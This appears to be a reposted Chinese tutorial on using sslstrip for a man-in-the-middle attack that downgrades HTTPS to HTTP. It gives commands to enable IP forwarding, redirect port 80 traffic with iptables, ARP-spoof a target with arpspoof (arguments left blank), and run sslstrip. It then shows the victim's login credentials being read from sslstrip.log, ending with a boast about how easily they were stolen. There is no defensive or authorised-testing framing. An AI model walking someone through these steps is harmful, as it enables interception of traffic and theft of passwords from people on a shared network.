利用sslstrip对HTTPS连接发起中间人攻击

栏目: 服务器 · 发布时间: 5年前

内容简介:利用SSLStrip发起中间人攻击可以透明地劫持网络中的http流量,查找HTTPS链接并重定向,然后将这些链接映射到类似的HTTP链接中或者同形的HTTPS链接。它还支持提供类似锁定图标,选择性日志记录和拒绝会话的模式。step1

利用SSLStrip发起中间人攻击可以透明地劫持网络中的http流量,查找HTTPS链接并重定向,然后将这些链接映射到类似的HTTP链接中或者同形的HTTPS链接。

它还支持提供类似锁定图标,选择性日志记录和拒绝会话的模式。

step1

首先我们将设备设置为转发模式,这样我们的设备就可以转发目标不是我们设备的数据包。

echo 1>/proc/sys/net/ipv4/ip_forward

step2

还需要设置iptables,将流量从80端口重定向到8080端口,确保出站连接发送到sslstrip中。

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

step3

需要找到我们的网关

route -n

前三步如图所示

利用sslstrip对HTTPS连接发起中间人攻击

step4

接下来我们需要找到目标主机的IP地址

利用sslstrip对HTTPS连接发起中间人攻击

step5

攻击者利用ARP欺骗技术将虚假的ARP消息发送到局域网中。

arpspoof -i -t

利用sslstrip对HTTPS连接发起中间人攻击

step6

现在我们打开一个新的终端并监听8080端口,命令如下

sslstrip -l 8080

利用sslstrip对HTTPS连接发起中间人攻击

step7

现在我们转到受害主机中,并且在浏览器中输入facebook.com,我们知道Facebook本来是使用的HTTPS协议,但是这里我们看到与Facebook是通过http建立的连接。

利用sslstrip对HTTPS连接发起中间人攻击

step8

现在,返回到家目录,查看sslstrip.log日志文件,我们可以看到受害者登录时输入的用户名和密码,如图:

利用sslstrip对HTTPS连接发起中间人攻击

就是这么easy,我们就拿到了受害者的凭证。

更多kali Linux教程,请参考:

·Lynis— 开源安全审计 工具 详解

· sqlmap- 检测和利用 SQL 注入详解

· HPING3— 网络扫描器-包生成器


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

互联网+秋叶课堂:我的网课创业

互联网+秋叶课堂:我的网课创业

秋叶 / 北京:机械工业出版社 / 2016-3-1 / 39.0

在线教育被很多人视为 “互联网+”创业热潮中的下一个风口,越来越多的老师和创业者选择在线教育创业。本书作者秋叶老师2013年双11正式带一帮小伙伴开始在线教育创业,在短短两年内“从0到1”,累计做到了超500万元的销售业绩,成为国内Office领域在线教育运营最成功的团队之一。在这本书中秋叶老师结合自己的实战经历,向各位完整剖析了两年创业的真实复盘思考,是一本值得在线教育创业同行入手的必读书。 ......一起来看看 《互联网+秋叶课堂:我的网课创业》 这本书的介绍吧!

MD5 加密
MD5 加密

MD5 加密工具

SHA 加密
SHA 加密

SHA 加密工具

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器